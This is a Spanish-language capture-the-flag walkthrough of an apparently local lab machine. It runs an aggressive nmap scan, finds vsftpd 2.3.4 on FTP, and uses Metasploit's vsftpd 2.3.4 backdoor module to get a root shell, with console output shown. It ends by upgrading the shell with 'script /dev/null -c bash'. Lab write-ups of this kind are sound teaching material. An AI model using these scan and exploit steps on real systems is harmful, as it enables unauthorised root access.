Firsthacking

Una vez desplegada la máquina haremos un escaneo de puertos abiertos con nmap.

En mi casa utilizo el siguiente comando:

```
nmap -p- -sS -sC -sV --min-rate 5000 -n -vvv -Pn (ip objetivo)
```

- -p-: Escanea todos los puertos .
- -sS: Realiza un escaneo sigiloso (SYN Scan) para detectar puertos abiertos.
- -sC: Ejecuta scripts predeterminados para recopilar más información del sistema.
- -sV: Detecta las versiones de los servicios en ejecución.
- --min-rate 5000: Acelera el escaneo enviando al menos 5000 paquetes por segundo.
- -n: No realiza resolución DNS, trabaja directamente con direcciones IP.
- **-vvv**: Muestra información detallada y actualizaciones constantes durante el escaneo.
- -Pn: Salta el "ping" previo y fuerza el escaneo, incluso si el objetivo no responde.

una vez realizado el escaneo vemos que tenemos un puerto puerto abierto

```
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 2.3.4
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Unix
```

Es el puerto 21, como no tenemos ninguna información buscamos en metasploit para ver si es vulnerable por lo que abrimos metasploit con: **msfconsole** y buscamos alguna vulnerabilidad de vsftpd 2.3.4 con: **search vsftpd 2.3.4**

```
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search vsftpd 2.3.4

Matching Modules

# Name Disclosure Date Rank Check Description

0 exploit/unix/ftp/ 234_backdoor 2011-07-03 excellent No V Backdoor Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use 0

[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
```

Vemos que si existe una vulnerabilidad por lo que utilizaremos la opción 0 que es la única que hay. Luego veremos las opciones que nos muestra con el comando : **show options** y vemos que solo nos pide la ip de la maquina victima que se la facilitaremos con **set RHOSTS 172.17.0.2**



Ponemos run para ejecutarlo.

```
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 172.17.0.2:21 - The port used by the backdoor bind listener is already open
[+] 172.17.0.2:21 - UID: uid=0(root) gid=0(root) groups=0(root)

[*] Found shell.
[*] Command shell session 1 opened (172.17.0.1:38967 -> 172.17.0.2:6200) at 2025-01-13 16:48:20 +0100

script /dev/null -c bash
Script started, file is /dev/null
root@d7e241c13e32:~/vsftpd-2.3.4# whoami
whoami
root
root@d7e241c13e32:~/vsftpd-2.3.4# |
```

Y ya estaríamos dentro, yo lo que hago por comodidad es introducir el comando:

script /dev/null -c bash

Para que sea mejor estéticamente.













